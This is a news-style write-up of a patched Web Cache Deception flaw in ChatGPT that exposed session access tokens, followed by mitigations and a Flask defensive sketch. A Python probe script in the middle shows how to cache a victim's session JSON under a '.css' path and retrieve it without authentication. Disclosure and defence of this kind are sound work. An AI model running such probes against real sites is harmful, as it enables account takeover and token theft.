The OpenAI team has fixed a critical ChatGPT vulnerability that allowed attackers to take over other users' accounts, view their chat history, and access their payment information. The bug was reported to the company by bug hunter Nagli, who provided a video demonstration.
The researcher managed to carry out a Web Cache Deception attack. While examining the requests that handle the ChatGPT authentication flow, he noticed a GET request that could reveal information about the user: "https://chat.openai.com/api/auth/session"
Each time a user logs in to ChatGPT, the application retrieves the account information (email, name, avatar image, and access token) from the server.
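A representative session response, with every value below an invented placeholder rather than real data, looks roughly like this:

```json
{
  "user": {
    "id": "user-abc123",
    "name": "Jane Doe",
    "email": "jane.doe@example.com",
    "image": "https://example.com/avatar.png",
    "groups": []
  },
  "expires": "2023-04-25T18:31:02.163Z",
  "accessToken": "eyJhbGciOiJSUzI1NiIs..."
}
```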
The expert simulated a situation in which the victim receives from an attacker a link to a non-existent resource, with a file extension appended to the endpoint: "chat.openai.com/api/auth/session/test.css"
Even with the ".css" file extension appended, OpenAI returned the sensitive data as JSON. This could be due to a regex error, or simply because the developers did not take this attack vector into account.
Next, the specialist noticed that the "CF-Cache-Status" response header returned the value "HIT": the data had been cached by Cloudflare's CDN and would be served again on the next request to the same address. As a result, an attacker can obtain everything needed to hijack the victim's token.
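This behavior could be probed with a minimal sketch along the following lines. It assumes the third-party "requests" library; the URL comes from the article, while the cookie name and value are placeholders, since in the real attack it is the victim's own browser that supplies the session cookie:

```python
# Minimal probe sketch; assumes the third-party "requests" library.
import requests

ENDPOINT = "https://chat.openai.com/api/auth/session"
# Appending a fake static-file suffix is the core of the deception.
poisoned_url = ENDPOINT + "/test.css"

# Placeholder cookie: in the real attack the victim's browser sends it.
cookies = {"session-token": "<victim-session-cookie>"}

first = requests.get(poisoned_url, cookies=cookies, timeout=10)
print(first.status_code)                      # 200 despite the bogus path
print(first.headers.get("Content-Type"))      # application/json, not text/css
print(first.headers.get("CF-Cache-Status"))   # MISS on the first request

# An unauthenticated request to the same URL now receives the cached copy
# of the private JSON.
second = requests.get(poisoned_url, timeout=10)
print(second.headers.get("CF-Cache-Status"))  # HIT once the CDN has stored it
```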
In summary, the attack proceeds as follows:
- The attacker creates a dedicated ".css" path for the "/api/auth/session" endpoint;
- The hacker distributes the link (directly to the victim or publicly);
- The victim follows the link;
- The response is cached.
The cybercriminal then requests the same URL, receives the cached response, obtains the JWT (JSON Web Token) credentials, and gains full access to the target's account.
There are two ways to defend against such an attack:
- Using a regular expression, instruct the caching server never to cache the endpoint (OpenAI fixed the bug with this method);
- Return the private JSON response only when the endpoint is requested by its exact path, so that a suffixed URL is never treated as the same resource:
- http://chat.openai.com/api/auth/session != http://chat.openai.com/api/auth/session/test.css
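As an illustration of the second recommendation, here is a hypothetical Flask sketch, not OpenAI's actual code: it serves the session JSON only on the exact path and, as a server-side complement to the first recommendation, marks the response as uncacheable so no CDN will store it:

```python
# Hypothetical Flask sketch of the mitigations; the route, payload, and
# header values are illustrative, not OpenAI's implementation.
from flask import Flask, jsonify

app = Flask(__name__)

@app.route("/api/auth/session")
def session_info():
    # Flask matches this route only for the exact path, so a request to
    # /api/auth/session/test.css falls through to a 404 instead of JSON.
    resp = jsonify({"email": "user@example.com", "accessToken": "<jwt>"})
    # Instruct every cache along the way (CDN included) not to store it.
    resp.headers["Cache-Control"] = "no-store, private"
    return resp

if __name__ == "__main__":
    app.run()
```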